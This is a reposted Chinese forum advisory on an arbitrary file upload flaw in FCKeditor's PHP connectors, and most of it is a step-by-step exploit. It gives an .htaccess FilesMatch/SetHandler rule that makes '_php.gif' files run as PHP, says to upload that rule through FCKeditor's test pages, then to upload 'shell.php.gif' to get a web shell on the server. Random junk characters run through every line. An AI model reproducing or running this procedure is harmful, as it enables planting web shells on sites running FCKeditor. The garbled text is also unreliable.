FCKeditor所有php版本Upload上传漏洞
1 _3 Q, ^) I# D E. f& F. }6 ^作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:071 C# H% ?* h% i( c! G9 l0 x u, n
减小字体 增大字体+ X7 V `" g0 h7 t0 X
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
# B2 u8 e4 z9 ~! Q% P[+] Date: 2011
: s' h ^- k& O0 q( A[+] Author : sinesafe.cn8 }- M3 X! C# {" r
[+] Website : WwW.sinesafe.cn+ G6 d5 V; x8 h9 P. ~, @
———————————————————
0 U: {% X" ?" j& N7 _1.create a htaccess file:8 Z& f; X6 f0 \/ Y9 Z
code:; z( r; Q) [1 f: p
<FilesMatch “_php.gif”>' }# r8 q/ L d1 f S9 z
SetHandler application/x-httpd-php
" }% y/ y) T- s/ r8 ^" r: F</FilesMatch>
' j9 R) V8 L& r# B3 w- \; @
% ~4 z8 q) A' U+ Q u( `6 P0 y: d2.Now upload this htaccess with FCKeditor.9 A4 H4 C: N, N& ^. h# M
7 t, U: \% h1 X5 F. z& Y5 H& @http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
6 a, M, M$ i6 g" J/ ^3 R, l* M* G" C: ~
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html3 \6 }, b- ]% H; S I6 X! P
4 a! c; N O' q. `———————————————————————————————-
+ F* [" E g# f: q% ]# V3.Now upload shell.php.gif with FCKeditor.
7 u% }* q) \# q( s4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.1 m3 [* `7 J" f* }) n
5.http://www.sinesafe.cn/anything/shell_php.gif) ]% b4 I: Q% {! k6 o- c
6.Now shell is available from server. |
, U3 v0 Y: j# K0 ^
7 y" A o( G e' ?7 w" a
; h- A8 T; d/ m4 H/ M
|
发表于 2013-10-27 17:25:21
收藏
支持
反对